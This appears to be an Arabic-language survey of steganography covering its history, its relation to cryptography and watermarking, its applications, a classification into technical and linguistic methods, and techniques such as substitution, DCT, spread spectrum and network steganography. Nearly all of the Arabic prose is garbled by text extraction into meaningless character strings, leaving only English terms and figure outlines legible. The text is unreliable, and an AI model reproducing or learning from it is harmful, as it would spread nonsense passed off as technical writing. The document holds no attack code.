4_iLgC ^ (j&ill Jl J-^Ll} La <Jjl u!^ 6L -)L* s-li^.1 (jc Cllj laJI -^C-J .^J c ' J^ 1 <LjaJ Silk-a CjL» J c L!a£ (j-a clA^ 

^^isu V 11a j£l .(key)JI j' ojLill ^-LiL* ^l^ikiuL V] ^ j^A* jj£ csj^l 3. i .j.>^a U^j^ jl (Cryptography)^-* J*-a1I 

UK CjUUJI $-la^L ^ - galj j^l J cilU& t^al jll J . j^*-!l <^La *La^J Ig-!^^ c>» J^ * \^ <Lja3l j& ji 
.Steganography^- 5 ^ ^ j JjuiVI (j-a JL^ajVI li& jl cjULuII ^3 Qftg^ La Jj^al jlll 

.aJUII JJ^joJI J <IajaLLQ AijjIaJ <liu/VI J jU.Loj ?lg_Lo hq^Ml j l^iluijSl 

11a jjc I^SSj ^jia^su ^g-^j laj > o j J^-^ djLo jIslaII ^ 4jiqMl j\ <Lj]aJI djLd jIslxJI e-likl jl Steganography ^K 

(J^3 ^stJ ^jl (Jj^ (j-a^juj Jl (^ JQ^ a JJJ^a C5^" J') ^ J 1 ^ (JjIjujj (JU 4_ljj^)J^3l Sjjj^a ui ~ iklujj ^3 4(JliL<Jl (Jjif^J J*3 

^Lixll 4_^jJalj ^jjc. (JjLoj^)J jjj^all 1 aIaj ;ljjj^a Q^^Lih q±> uJI ^jl JaJ ^jLkJl ^j-d U -0 

^jjUjIuj /'steganos''^ oxEyavo^) ^-^1 c> "^^^l ^^1" J*^j c> Steganography <^ 

ul c> ^iikJI jll JLaj J ^jxia^ .<jUi3l J*jj t Jl '"graphei",( ypacpfj) ^Kllj ^ JaiJI jl c ^x^ll J*^j 

CjVjUa Jc <jjjoJI 4JLaj^)3l Ij^UcI ^jc-VI ^Ui^ ^ji^jjlj l^Jj <-<»j^a oj^sj Aijja .(JjjLujVI J^j^ ^c^^ 1 

_<j3ljajj J^ (J 1 £xul3l AjI^I jl ^Jl ^*J^ 6 ^ jj^aL<Jl ^akjuall Jc^ 4JLuJ^)3l (Jj^aJ (j^J .^ulll <a±laJ l^jjaij ^1 t< . Lula II 

L5^H UJ^J^ I (><1 J^ _^i!aJlj U^jj^aC (JjjJjLLaJ t^^^gjuall (_>ia3U 4 Jmi^ j dljl^ (jl j t^pa^sJl (Jjoiil ^^kl ^iljajj ^J^jC-VI ^ iklLujI 
4jujIj 6J^)3 ( Jaija to^stjuj (JJaJ <J^- Q ^1 IaAsu _4_jaijLJl (_>JJJ^I J^ ^^^1 ^-!Ujj^)3I (^jujj) ^aJJ ^aJ t^nxJl (JJJJJJ 

J j _^JLuj Jl I Jjj 6^Asl!I (JjjIj J^ J^-VI I^A ^ajli ttilLiA Jl l!^^ J .^>^VI L_flja]| Jl <j jLojjJj t^l^Jt-d AjjjoJI 3JLojJI j) 

^JJ^JI Qjjf^ a\\ j ^XixJI CjI j^I ^aAl ^.1 (^JjoJI jfiJl jl£ dlU^Jl JJ^asJl 

djj^Ja Jll d iVqj; Wi\l ^1 q\ .CIjULJI ^ A a j o^j^c ^1 jjl ^djLalx^l j CAiUJ! £y* f^y l$\ ^li^l ^ 6 c ^ajl ^JUJI J j 
^l^<JI CjUi jlx-<JI ^jj^^j] a laJLujjj jl^aJI (J-iT.uij Aic. Ujlitj Jjtij tL-iL^aJI ^a Jll (Jkb Partition j^- ^Uijl ;4_u£i3l ^ ^ilj 
<o]UL J t "Johannes Trithemius"c> j ^^J u^j^ c> 1499 <^ ^\^^^ \ ^I^IujV JjI .UjU^I 
jjlsLxi ^(^-^ ^-jl Jc- j^Jaloj JjLojJI ^jli tUi jac j .aj^joj lijlsu Sjjj^a Jc ^^31 <jU^3I j jjjjuall (jc"steganographia" 

. "cover text'V^^ o^" l$ J &t ^J* J J 
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jjjjujjli ^^ic ^IjC. jjUulaJl 6 (jl _<j^aL^ 4_lLai^)3 4_ijj>JI jjJajaJl Qli ^>f=^ ^J^^ UJ^ all 4_lLai^)13 lllSUll a jfrLall 

I^jjI^ (jl^J ^JJ -^D* J^P ^A^^ (jc ^)Iaj3l (J^asu 4^ jjJa o^iu^l <JjLoi^)3I .^Lu&VI ( ; >>laJ V l^jli ^aj 4_lLui^)3l ^j! j& O^^Jl 

Jjujljlill L_fll^)ialj <!Luj^)3I aaJ ^jl ^IjC. auludl] (j£-aJ t4JLaj^)3l (_£ jla a jjLudlll ^ <l^J c£^I dlS jll [J] jjjjaull ^laj ^^jll (jl,Ji3l 

Liia o I j^jj ^jjj^IVI cJL^liVI jj o - <alj (jl (j^j ^^g^^)!! ^Ijc. ^UulaJ! jjojL^JI dAiL> CjLg jLlxJI ^likl ^Ijc. jjUuluJI <J>ujjj 

t ■ UjudJ CjVIjujj^U 4_i3Ha JaLoijI S^AxlxJl kjl ■ u j]| daliLa -( J j£ tajjj^ t flLa < IiLu^q L_flL» JLa tJSUll Jajui jll (_£ jlud-o 

L_fl^p. (Jjlljl tialaill (j£3 (piXGl) ^Jakj (jj3 lS-^SJ t^jiLa JJC. Sjjj^ ^AaJLujJ ^j) <Jjuj^<J clA^ 6 (J^^ } & A y*> 

_a all ^islSU AiLuU^I (J-al^xJl ^)JC. (j-aj LV 1 J '"^ ^ j I Q J°^ jJJxjll jj^J 1 0 

<Lla jjc. j <-<i j^i^ ^jj^il <Lg j1s«-a3I jjq ujj jl > ^alklj ^^-isu j Cryptography jjq^l ^llaj^axj ^axu jl aj^3 j^^I 
,U^iij <jLaLi3l j^^^ ^ j^j (^^>^ (jc- t "S^o*-^ jix-<Jl (_5-^*j ^illj Steganography u^j 

ti!U& (jl Ai^stxi ClJl!i3l L_fl^)IaJl ^ilaJjoiJ Lo jlx-o JJ° ujJ AiC (jl CjU» jlst-<Jl ^liklj jjjjujjll ^jjJ ^.t.»Lt.»Vl (J^Jl (jl (J J^l ^llaiudJ lil 

(jjJC ^ jl (j # U^>^ ul (jjlJ ^aJJ (Jl >^>M 

C-ljj (jxi ^aJJ (jAJjj ^jjAJ (jU-ajj tilLiA (jl jl ^liiJl ^q-N ^ ^^^joi tilLiA (jU lUIj (_^V ^alc liltiA (jj^J V CjUi jIslaII ^likl ^ 1 <ft 1J1 

. jL^ajVI liA ^U^V U kljai j ^1,^1 ml 4jV (JjJI J^3l 



[Figure: classification tree with the nodes Security Systems; Information Hiding; Cryptography; Steganography; Linguistic Steganography; Watermarking; Technical Steganography; Digital Images; Robust; Video; Audio; Text; Fragile; Imperceptible; Visible; Fingerprint] 



;(jLudjVI (Jjl^J CjUaLaJl Cjl^l^ijl CjVI^. <^9 l-<^ lu^-^j ^ ..^ (^5^ T ^ 1 ♦ cJj^ L_JJjoUJ 6^aA JjiC. jl CjUU^SlSI jl CjllaLaJl 

(jl (jj^ 4^31x13 <LiaJ| ^JU^jI ^ 1^)31 tdjlcl^ill j CjI j M j^p*^^ uj^^J (jjjq^ > ^>ll j (jJjajlj-all j jl t^J^VI t_j j^JI ^Ijjl j 

U L-Luaa^fl 6(J^^ >* 100000 ^ C5^^ J '^W^ ^^Vl UjJl (jU J>^i^ U tdi^UJl £>ifc ^ Jlio j 

^ (The International Center of Human Rights Research) u^V^ c3j^ <^^l ^hi^ l (jli(Korhorn) 

^ j£juJI SU^ ^^ic ( 1 lafll ^ j diUi jlx-<Jl f^lc dllj^a^3 t jj^unll ^ ^jVqlll oi^ ^I^JjojI (Jj^a (jC 6(jUc J J^juJ (j-d td^l^juo 5000 J^- 
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tAjjjjJ^lVl OjL^jll J CjLdl^Jjajl IgJ q\ j&j laJjudj t . UjuJ ; jjl^Lll ^Lu&l tA^jSSll £>i& <J^* J CjL^jVI (JajujJ Ull^. 

^AaJLujj j .(Watermarks) ^j*^ ^ j> 4-jj^II dLa^^laJl \ ^jlkulaj j^ l_ . j^-1 a*j U<>jj 1$j ^Lu&VIj tl^linlaj •jbjj Jll 

till,j£j tlA jJC-j J°J- o J-<Aj <J^aLkJI CjUI jLjuiVI '4-i^j£ll CjULaO j>» ^Itj ^A-Lafjjll dil aaloll JjjlaJl Jai^ dAjLaO J Sjj^VI 

t^tUxJI J^ta ^ jj jjl <*-sj*j V *u£3 ;CjL<»^Isl!I j ja. jj ^isu ^ ^c. jJLa .CjjjjjVl jjc- ^AJl Jll £lx»1jj11j jjj^II 

.^cjouII S^lclj tl^jlljl ^aJc L-ixj ^ij JUlbj t jjjjuall ^-ULd j jjuJ! V j t^lLkVl J ^klail (_^ilt ^c-gUjjII V j 

Application of Steganography 

dlLa jlsc-all j-a 6 jj-tJl La Jc AaIsu Alkl<Jl j j^.1 Jl AlSalo j-a jjj£ J c allkj (StegailOgFaphy) <^Aj* jl*-all e-likj (JJJiaJ 

; JV1 Jc- (3flaJJ dlLa jLlaJI ^ILkl ,lg-La S^UludVl j 

Access Control System for Digital Content Distribution 

-L £ jJa all (j^V 'dj-uiLft' l^iilj i'^L&a 1 JjSj ^jJaJl CjULuII i'^aSj]) ^j^aJ) £0j^ ^Uajl 'Jj-ufl j]| fUaj' J 

^IjsVIj ^ j^j J°j'" j-oll CjI^jjuj ; JllxJI J-ijjuo Jc „ (Jjii ji&l djjjjVl <£jjuj jjc- *>jj£j ^ jjj 4_LaiijJl dAjjla all di^jj^l <^ jJl 

Igjujjj* (j^-aJ l—Ajjla all ^jli 64_1L^J1 J .cJ^I J' "ShW^ ^^A^ ^ a 1 ^ ^ ^ ^-r^J^ aN °'^ Jc- .JJ.JJ>Jl l^-ft jJl (jc 

^jjjiill j 6^<JL^J <!L^.^ Aj^IslSI C_JJ_ail £J jjJ jnin^ ^ ^ L-IjujI m V ttillil _4 jj^ jll/^ jl jll (jjill (JjjUII Jc ^ jLoaiillj 

^ji (j^j Steganography ^>^>^ ^ saixjuj ^jjSj l_a jx* tdiji c Jliijl cJ^j c5 jSa^SI u>ib ^ jSj ^ jjuj Aikjujl jj ^ill j 

c> yr**J^ l^j 1 ^^ (yjj^ " (^4cc^,s Control Systern)dj±^ <&j* (^(prototype) JjVl ^i^l jjj^j 

UU\ tiA aJUI! cjI jJaiJI ^ jJii .Cij jljVI J^U 

clc q , J <U£ CjI all 

^jAjja^ll f.lc jll 11a Jj^^i tdjl^l^Jl Jj J jj^a jll ^jjLLft Jl ^A^Lu^all Steganography s- 5 ji^V 

m A i^aL^Jl 4-JJjll Jc ^5 jla all 

^)judj ^Ijj .^llj<-ll ^L^Jl ^i^- (J lA^jjuljj <lq*lLa <L JaJ jla all (*J^ j*^ all ( ; l^L ^> <J <j^aLaJl 4-lJjll J^ "2 

jl) tiULall jj^J 6<1UJ1 d^A J Ij^Ui Jjill ^XaxJl (>» all J jj^s jll CljUlSa i^ULJI JljJ 5JLaJl £>i& J -3 

.(jLall JjlLd jl UU^) ^XixJl Jj lg-AJ^J j J jj^a j ^Uio *L^Ij (V ^ 

Steganography File Systems 
^ j .jiAA ^\ j if\±±i jj tjj^ j^jI ^jj <^jjS1 Jjl ^liloll ^xJajl c> ^jj ji Steganography File Systems 

Igjailj Jc 4_jj1 juitJI Cjtnll ^j-d !)L^1 L-fllllj jllj ijtill ^ 11 dlli dilil-all 4_LaiLaj al laJLujl j ;CjULii3l ^li^-V (j-jlj > uJJj ^jjjajjla 
^jxiVI CjUjlabd J ja. jJ ^aisu V (j^lj <^^VI CjUjlLaball JJ° ^ <^1^ L>^^^ djUjJjabal ^ojujJ <LjiaJ l^jJajfl ^aJJ jllj '(veCtOr)^— 5 ^^ 1 

.tSlli J ^jfiauoll CjULJI j AjjI jj^xJI CljUilU ^ Jx» J^l£ ^uai jt « JcVl 

j^ 5 ^j^? (4j V djULlI ^ j Steganography File Systems J^' j Aijjlall 

jaJ ^JJ Ulk^ J^j tJj^J jUll A^IjjUI ^JalLoll SjL <Jj^j S jLlall CjUloll— UjI j*k^ ^ij J^l£lb Jj^j jUll jil 4 6 jLla 

jj£j* dlliLall ^al jx» jli ttilli Jc oj^lcj ,4_iixill Sjiuioll CjUIaIIj IgJ ^^ix^ V ^J^aj (JJJ jjJ/QjH 4_1^joj <9JjIa Aa. jJ V 6 jjuJJjUll Jc 
^j£-oJ 4Jl J^J Ai£jaball Jj c^^JJ I^J .JJ^y^^ ^al£ ^Lxiljjll Wq^ A ^llaj A-li^ a jj^J CjliLall ^1 jxij ;djlil-all ^JjlLa <Jjfj j>» AijJLxi 
.CjUIjjII Aflfl 4_j^aj3 JjISjI 6^A*lft (jSLftl J CjULall <il£ 4_jIj£ (jJjia (jc 4_L^ ^jj I^Aj ^1^ <CjjaiJ j^axJl l^jJajU djULall ^jjS 
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Media Bridging ± 

jl iiLuiaH t aLa (JiLo t (transport layer)cJ^^ <Lia J jjj£3VI djVU^ajVl j^J^ L — ^ 44_La3jl diL* Jx-JI ^ILkl ^l^kiaal 

j& ^.1 j Jl (diljUJl — W)\ > u jllj CAjLJI (j* (jJC jill J 6 ^ A L>^ ^dj^^ CllLa jlx-<Jl ^likl J^lllaJ <aiaixJl £>i& J 

Jc (_£ ^ 4<Jtl<Jl <J-1JjuJ Jc 66Jjj^3I .L^^)^ 1 ^ dlLd jl*-<Jl (jlaXJJ IgJaJj ^aJJ (^Jl t^qjni j>Jl t^liVI 6 JJJ^ll) (Jj-0 W)\ > 0 jll .4.1A&I 

;CjLg (j* Jj Ui 
.physical object i> cjUJ*JI o^xjj Sjj^ll jtjjc -1 

_ jjj^axJlj 4 ^ laJLmASi I^lgI^II (jc djLd J*.* -3 

liflj la all dAiLull (J A'SJ C_fl jjol jlLal/Jl CjULlJ Vjl I t 1>J (CjLq Jx-<Jl (J-^JLJ J Aic ;4_iLosl1I C1jIjuj^)L<ia]I ^3 

,1^.1 (_£,i3l jj QlAjJaH £C^U^)J ^I^JjojIj AjJjoj dAiUj QlAjJaH a J 6^aJ /ajLja JJC. £0 jlauJl (jj^J (jl ^irjnj .(jj<u ^>Ml <«— 

£C^U^)J ^Ia^LujLj (ciL (j^aLiJl L_fl Jail) ClAjLJl l^-ljVlml AlC- ^UixJl (J^axJ £A t . lla Uia. (djLd jIslxJI pli^j £L^U^)Jl ClAj 

^•ULd' Jl ^ll^J <!LaJl £>i& Jj ^Jjjjuall ^a J^i-G Cilia (j>* ^alaJl ^IjLall) £-UL<J! (JJdiij *LL<uJa^ ^—^-^ ^bjloaV (^>^-l UJ^) ^Ij^^ 11 '! 

.cjVI^VI J o^jli^l 

— j — (JLojjI 1 ^.l^a.lj ^UUI ( ■ laJ tiL (j^aL^Jl L_fl Jail J <— ij^ (j^J .J ^ ^1 1^ J l^judJl j& JjjJ^ll ^^>Jl <!Ijuj^)J j^jIuj L_flL* (jlijj 

^UiUij (_^jjuj (JU^jI l_j jLujI (JjjJ J jjj^IVI -^>J1 ^Ia^jjujI tlil l_ flja ci^ u-* 1 (glh^^La ^jj (jl (j^-GJ jll 1 

cJjiall Jl ^1 JLuijI Jl ^H^J V <Lj]a3l £>i& J .dlijliVI 'c-JJjll ^Uij^a' ^Vinn ^ill Jld c5j^Vl jL^ajVI c_j jLujI c>asu cilllA 

; JU3I Jliall Jl .ciL ^UJI Jl^iVI ^jWiun ^1 Vj <4i o^^> 

. JU3I J£^l J U£ ( Mr. Bj Mr. A) '' ^ cl^^ ^ J u'^Jd U J ' ^ '' 1 u^j^ 

(j^>^ uJl j t^ol^dl ojjj^J ojjj^ '--J^^ lilLaJ ]\Jr # A (J^akjaJl (jl ,ClljjljVI A£jjoi Jc ^-J <j^L^JI 4-lJjJl CjLa^a J£ ^J^5 (jl AaJ 

^•l j^1uil/(jj^> >iM (j;!*^ tiljloui ^I^jjojI Jc (Jjtillj lial j (j^VI j .(c-t^l ^— 5 j^l Oj^^) Oj^^ ^ ^>^^^ jA ]\Ir. B 

;^VIS ^ JLua2VI li* 

4JLojj ^LijU Vjl Mr. A 

,AIL ^ t_JJ Jl A ^ Jc IfrllA^JJ IVJl". A (j^akjaJl ^ajlj ^aJ -2 
.l^llAaaj ^ajli ^aJ ttillij Mr. B (J^>^ uJl -ia^.^} L_S jjoj Ujj3 ~3 
.^-liJ tiljjulxJl ^UlixJl ^xi ^"l^)^JjajVI ^1 iklLujl J OJjj^all C-Ajjla ^ ^I^)^JjujIj ]VIr # B (J udll ^J^J -4 

. Jjlill Cj j^JI Sjjj^a ci^l^ ^\^>>>"j ^jij ^ij .REPLY j e-L^j-j Mr. A (j^>^ > f ^l ^ j^j -5 
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Copy Prevention or Control (DVD) it 



.4^*11 ^IjaVlj A^Jl jj^II o^\J^ j^j cAJUll JjL^ ajU^J industry steganography jSaj J^j ^ 

.^Cjudill .111 jJ ^»Uaj ^C^l ^ 4_kjudJ ^jU^. £Lx»U^)J ~j ^ > 

Metadata Hiding (Tracking Information) ^t 

jjjc. jVI l$\ 6A_L<»a^)3l ^1 ^<JI ^cjoij jl ^i<i j t^l^x^JI ^fiil (metadata) ^ ^—^-^ ^I^jjujI (j^j 

Broadcast Monitoring (Gibson, Pattern Recognition) Jt 

Covert Communication ^t 
Ownership Assertion 

Fingerprinting (Traitor Tracking) ^t 

Authentication (Original vs. Forgery) ^t 



Classification of Steganography 

^piiill CjLg jIslxJI ^t> j m £Ju* jIslxJI djUjij J] bliLajl ^jJL^xi {Steganography) ^Ju* eli^l cjLi&i c Vu^j 

. {linguistic steganography)^y^ djUjkJI j {technical steganography) 
<j^ii3| CjLg jlx-<JI ^likl ^j^j 1 aiij 64_l<Jjl!I L-ulLaaVl ^1 laJLujl j 4JLuj^)3l ^liklj ^ j^j {technical steganography) ^°*^ CjU* jLlxJI s-li^.] 



jUUI jl JjLoj jll JSj jl JL^j!^U ^Vi .. n t {Carrier) gi jJI {linguistic steganography) 
.CjLgj1»^3! *U^t ^ULaj i Jalillj t4_iik^3l aJLojjII ^jjj £*^JI AjI C5 ic (77i^ steganography medium) <*-^j1*-aJI e-lLk] .LjuijIa ^-^>*j 



[Figure: classification of steganography] 

Steganography 
  - Technical Steganography 
  - Linguistic Steganography 
      - Semagrams 
          - Visual Semagrams 
          - Text Semagrams 
      - Open Codes 
          - Jargon Code 
          - Covered Ciphers 
              - Null Cipher 
              - Grille Cipher 

(technical steganography) cr^t cjUj^-aSI ± 
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; JVLS ^$1* U^xj J^-ujj j B 4JLuujll f l&) (jjlaal L-ull ' uVt JjJaJl 4j.il Jill) CjU jLla!) f l&) 

(Invisible Ink) <£>*M j^JI 
# (JjLojjII pli^V c£j^ll jf^t - iklujj l_j jLojVI I^a 

(Microdots) o^J^jJ** - 

.6^1 j <iaij J 4^q>^i lfr*I.VVltnl (j^J jll <L Jail ^ 

(Computer-based methods)>j£^ll J) SaHul^I ljJU&I 

6 jJ,liill <Uajj^l j dll jj^VI j jjj^JI j t(J^a jj^ill J 1 (pi q^l j dlLa jlx-all ^Ia^J ual 

(linguistic steganography) 4-jj*J1I cjUjkal) J_ 

Jc tA jvfflt o!a C qjn^il ^JJ .Sj^UaII (J Jail (J^asu ^\^±*>^(C(lVViev\VCSSCls) <J^ J AJLoj Jl ^J^J ^>*-lll CjLg jl*-xJl ^lik] 

.open codes J semagrams M 
Semagrams -1 

y J 1 U^^^*^ CS"^ ^ t al^aJ <ill,j£ .(JjLulJI jl CjUUJl pli^V 3 alia all CjL»!>lxllj jj^jl L-J jLojVI I^A a laJLuJj 

- ^ => > *alll (jjixil j^LoJjuij 

(Visual Semagrams) (gj**jto u^Ij^Uj^ - 

ajj^j jl cjI jUalll CjUjjoj j Jla 3JLoj j JLoj jV (unmalicious physical objects) * j^l ajjUII dAjjl£It l-jjLjVI 11a ^viun 

_d3jl3y| aSliA Jc £3 jaII jl l_u£-<JI J *^ ja. jaII jj^UxJI ^1 j>» 

(Text Semagrams) c^aUt u^^W^ - 

jjjxj (Jio tAJSUll Ajj^aill <ULaiJI jJjiu jl J^J^ (J^^A 3 4-l^JI (j^aj ^ILkj J L_J jLujVI liA >^ Iujj 

.Ail I Jakj L_J jj£ all (j^aill jl ClAjUakll J 3 alia all CjVlxijVlj Jl J g.1 > gaJJ djULoix^ 4_iaLjal Cjlaluix* AiLjajj 

Open codes -2 

Ja^j j 1 Jll j (legitimate carrier message) ^ -UL^ j J Jl f Open codes 

{overt communication) u^HaII JU^jVI ^il (JI-Lj Ul^l 5JLuj jll J^La. .^^Ull ^ jlSll <^Jal j jj^j V j , Vn >> i^ l/Aijj jll 
^ j '-o yy^y J u^^?^ Open codes '^-^ .(covert communication) cij^t JU-^VI j^^j 

.grille ciphers j null ciphers ^ covered ciphers ^ .covered ciphers j jargon codes 

jargon codes 

tCjLalSajL^iH j tdjIjU^yi ^Aaljujj ^1 j^Vl .^jj^^Vl 1 ^ a& aj V ^jSl j (JjjUII ^ <c ^ 1 g L ajJ (jc ojUc c _^a Jargon codes 
<L^a. Jargon codes ^^^^^^ ^ ^1 .o^^ ^^^^ ^-c- j-a^a! <^ j^-a-« ^^lll j ^ w ^ 1^1 ^^lll ciij^La.Vl j 

.^U^ I^jjj jj Jll CjI jUxJI JjaJ diia. i(cue codes) 

covered ciphers 

Jl ^ jill liA ^JUjjjjj .I^jJIxjjojI <Hjuj^)3I ^lia.1 AjL£ JjoJ lJ&jxj ^J^>^ ui ^l (jl L— LL^ JSUll laJ > >1 jll J Ulc A-ii^-xi AJLoJ^)3| (jj^J Aj3 

.null ciphersj grille ciphers ojj^^ u^jj 
^ Jill cjUja J jll CjUKJI .aISUII aJL. Jl ^kill ^ji^^j ^ill j (Template) ^jl] f^i^ ^ jjII I^a Grille ciphers 

.Ajaa all AJLajjII 

lUIjII t^jaJI Jl Jaill 11 jl 'a ud^Lkll 3_aK1I ik. o^ljill 1 Jlft t ILjoix ajjjaII ^cl jSII <c j-A^ ^l^klajlj aJLojjII J^j Null cipher 

Steganography Techniques ^ULJI * till cjUSj 

^jj jll Cj^IjAxIII ^Ikc; Jl taUU ajju^ j jx^xi dbaj Jl c al^aj (Steganography techniques) jl*^ll djluii 

! J*^^ .yj.^ 1 Aj1aC> J^ ^ ^ ^iAiaJ 

(Substitution Techniques) JI^^V) cjU^j J_ 
<L^I/4iilJa3l djUill JI^jIojI (Jjja (Encode Secret Information) cl^^A\ ji* jj ^1^-aII Jjl^ t^jjljajVI liA J 

aJLojjII ^IjaJLajl ^ i£ aJ AJli ;Ajjjuo3I l_jU» jIslaII ^jjyijJaJ A_i3 ^aJJ Jill ^j£UiVI ^^)xj Jll^ll jl£ lili .Ajjjuj aJLojjII ^ JSUll laJ i u jll ^jxj 

.AjjjuoII 
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(Transform Domain Techniques) l^j*^ ck* 2 ^ cjUSj J_ 
tSlli j ( JSUJI jll) (Ctfv^r Image) jj^JI t> -L^Lk *l j*j J cjU jl^ll *lLkb ^ jL Transform Domain Techniques 
J!* cjI jLiVI J J j^sll A T jL^ J^U ^> cillij The Discrete Cosine Transform (DCT) c^UiSl! ^\^Uu 
I^Aj . jj^l J c£ j^l CjUIaxJI ^j^alia (j^axjj <4-ujll Jc- l^jJa jxl jj*-^ll la xjJ a J^lk ^ Jla .frequency domain 

.lg_La£lj Sjjj^JI Jc jl jjj^JI (j* <Jj£ Jc d£ljj^jll £>1a (j.uIaJ .CjL&^JI .Ua <LgIjj^ jj£I 

Spread Spectrum Techniques ± 

a iklLuJj jll (JIj^jVI (JjLulj ^ .CjVIj^jVI Jc- (JjjjjjaLil! A a 9l£ a j (jlaljjc! (JUuaJ t QJ» - *all 4_Ljal jll J^jJ L_J jLojVI I^a 

^1 jll d jl^VI jU^ijl jUjI ^Lj .CjUjkJI JLuj jV (minimum bandwidth) u?^ j^ll <jUajII J*^ J^VI c> ^L^' * j^V 

CAiLlJ dlL* jlx-<Jl ^I^jJjojV ^Viml Jill ^1 J^VI ^al^Vlmlj (Jl ffiuiVl (j-al JJj i(<JllljUJl (j-G ^Jaluui) ^1 J^VI (j-a ^ (J^jia (JC- 

.Spread Spectrum 
(Statistical Techniques) ^U^V) cjU&U) J_ 
*Ua*ll JjAxj (Jjjla I^a (3^j . (steganography schemes)^^j^-^^ djlkSa^ J '^-l 1 ^j^j I^a ^vimj 

lilli ^aJJj .f-Uaxll J^HJ V LSJ^^I dVl^Jl (J^H J . ^ J] AjjI > (j^ajl > ^i^ll lP 3 *^ ^'diJ-X' <J^ i ^ c - ^ ^Lj^ 

_^jjatj^]| p| t (theory of hypothesis) ^j°^ ^rO^H L — ^-^11 ^Ij^iLui^U ~ ikiLujj _4_Iax-<J! j^j aJaslxJI ^ jU<~ Nf 1 jjj^n 

(Distortion Techniques) cjUjSj J_ 

Cover-generation Techniques 

t^AuJl ^ Aifkj Ia jiac. ^aii LjjJikjl ^^ic <JjLojj3! (JjjUII l_u£ t4 jjj^axJI ^"wax tablet" (jW^ 3 ^ ls* ^ cJjLuj^>1I 
I ^ > lajj <JLojj3l (jiil jll (3^- ^^ >f ^ j <til3i Asu l^S j3 Laj ^ill ^j^JI IaUoc. t "Histiaeus"^ 

C5 ic <jJaj^)L<Jl J J^J t«^*Sl J-^ (JIa 6<auJalj L_J jJC L_J jLojVI I^A -C5 jujjli3l (jC (JJ^jU jJI 

^a^C tilli ^J^J .6^1 jll <C jflaxJl <aij^all Jc 4 alia {typefUCCS) <— AjLa^lt L>^ 6£jUaAlJ JjVI J 

(JiLd i^qVj's a\\ L-fljLa^ll ^j-d (j5^l jl) (j^l ^lAaajujlj Ajia ^ <!Lajj ^jl (ja-^j ttillil j ^AjuUall L_fl jj^ll (J^su ^ Ajfll^ ^cjoij J ja j 

# JjIaII jl ^^Ixll ^ jill caj^jd 

4ijj JjLojj Jf^- aI laJLujl j oIxjoj j^Ja Jc <jjj£>Jl (JjLujjII (j^axj Ajjoijjill 4^jlLJl dilaijl 4_ijliill 4_ia31x1I L_JjaJl j!>La. 

(JjC- <£Ll2kJ (JJJJJ-« ^jfljolJ <Jjj£-G (JjLoJJ .C5J^-VI cJj^jll L>^ ^13^^ C5^>^l L^-^J ^— ^ 6 C5^ ^>f^ ^1'^*^'^ ^J^-* 

-C5 cLuJl l^jlijj Jll ^jjdJ^LJl ^ AjtiaS J 6A£la^ll A f laall cClllaJa 

<J lllilll CjLd jlst^Jl ^lia.1 J^Loui (J^flaJ ^5ja.j lA-li udll L-li> al jaJl JJ^Ja ^ 1985 J 4jJ.laJl CjU» jlx-<Jl ^lia.1 CA JU&l ciAl^ 

m A^\lA\ JljC. jjlsuluJl diLia^jJ AaLa aJalaU tlgi^Uajl ILd ^jSl j tllllaJ ^jl£ tilli t . lV> I ^ill jjjajll ^jl J^jW 
jj^all djliLo jl jjul^ll jjj^all A_iaA 
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^.l^xJI tit UiLdj <jjt jjujc jiil ibjLlA jj^j ^3 jj One-time pad jit S^J! jl Jl* ALla dit jLuJt (^t jJui*Jt 

. ("private key")<j-^ c 1 ^ 1 ^ v 

.dl jj^all t aL ^ ^Jj^alt J^^*^ ^li^VI 
.Cj jj^alt t aL ^ ^Aj^al) J^*^ ^la^VI 

m Jalill L_aLJ Jajuj 4J-&^ '^ S H a aLo^t ^Laaal CjIjUJI ^jj ^ > >i1 

^^HaII CjI£jLu1a11 j jjj^iyi ^j^t lS^-^jj 6CjL<J^3I ^jjIj j J AjjlaJt (jjl c-Hajlt lJ*^ 

^aulS t Cff £la>^Ul j ^^^LaJI JL^ajVl ^ I^J^Ljj (j^j <^jJt "steganogram" 4-^^Jt CjLg jl*-<Jt ^JalL> JjLj dLjaj* 
c_ii3LajVI Jj^^ .2003 ^ jj^ 1 ^j^j^" i> &i$J ^l^kiait Jjl . "network steganography" 

a£jjoJI ^IjC. jjlJuluj tA-ii^xJl djUUill £.Uai£ (jjjjilt j dl jj^Jt j jjj^I! dAiLa) 4_La3j3t lajl > o jit ^t jC. jjUulaJl ^Viml ^^jll <j\iMt 
Igic c aju&lt L. la > ^il C _^A l_u3LojVI *>i& ;ciI3i3 A yf" j .AjjuiLuiVI j^Jt t la jJtj dVU^aj'Vt dV j£ JJjJ^ ^£^j3I jj^alic a iklLaLj 

11a (j^flaJ (j£*Jj . JJ*Jj J^^t 4£jjuj J j£ jJjJJ (j^ajU^i. lS^-^ J 0 J*^\ A£jjoJ| ^IjC. jjUuloj L-lilLojl J^ajj .l^Jc ^Ljakllj 

J 0^5! <a^l*J! c> ^lil^VI o^uJI (>a ^ s .(JjSjj jjJ! cjUU j) PDU (Protocol Data Unit) l^^I 
.(inter-protocol steganography)^^^ cjLLfkil! d^a ^Sj .ajjjuJI dsVl^VI <illL^3! 4£fxi3l cjV j£ jj jjj 

. (Voice-over-IP)^^^ J jJI ^U^j- ^1 jjUjIuj 

t4_jjj£i3l (JjLuj j3U tVjl ^(plaintext ^j^^ l>^) '^-^j ^ j« cJ^j J uj^ ^ C5^L>^ J^J^' *-njqJi ^^>^^ 

(j-ajll 6 jiAJI oajll *\ j^V (cover text) ^Uac; (4j 6 ^ .ciphertext jaA^l o-^^ 

L_lJLajVI .AcUkll <LIS L-bou] tAj-dSjll CjUi jIx-aII ^ILk] cJj^J J ^ill jiui^ll (j^aill .(stegOtext) ^aa^ll <!Ijujj11 jl^Jl 

sUa c alftll J^j^ cj' c . 1 >j 6 I^a Jc 4<JLajj3l ^ILkV sUSlI c aLill J(noise) j^all Jc axuxj AjjJlill ^j-aijj]! 

.(ASCII Art Steganography) j* <a5II ^ J cr 131 ^ ^ b ^ 

^Sjl) Q^aU) -5 

tit .CjUi jlx-<Jt 4_jaLjat CjUL J-<^J Igit tAjx-nia jJfil DjUix-<Jt ASCII ^ J^? a ^JjaiJ lij^a^ J j^JJjJ-^t jC. jjUulLoj a laJLujJ 

allai ^ cJ^^ J^^^t ^pa^su t4^<JajVt (J^axJ tcilli ^ j ^jlxJt (J^ailt qC* ^jj^j (JJ^ tilUfc (jj^J (jl^ t^j^ > ^> cJ^*^ C-H^t ^jiajC. 
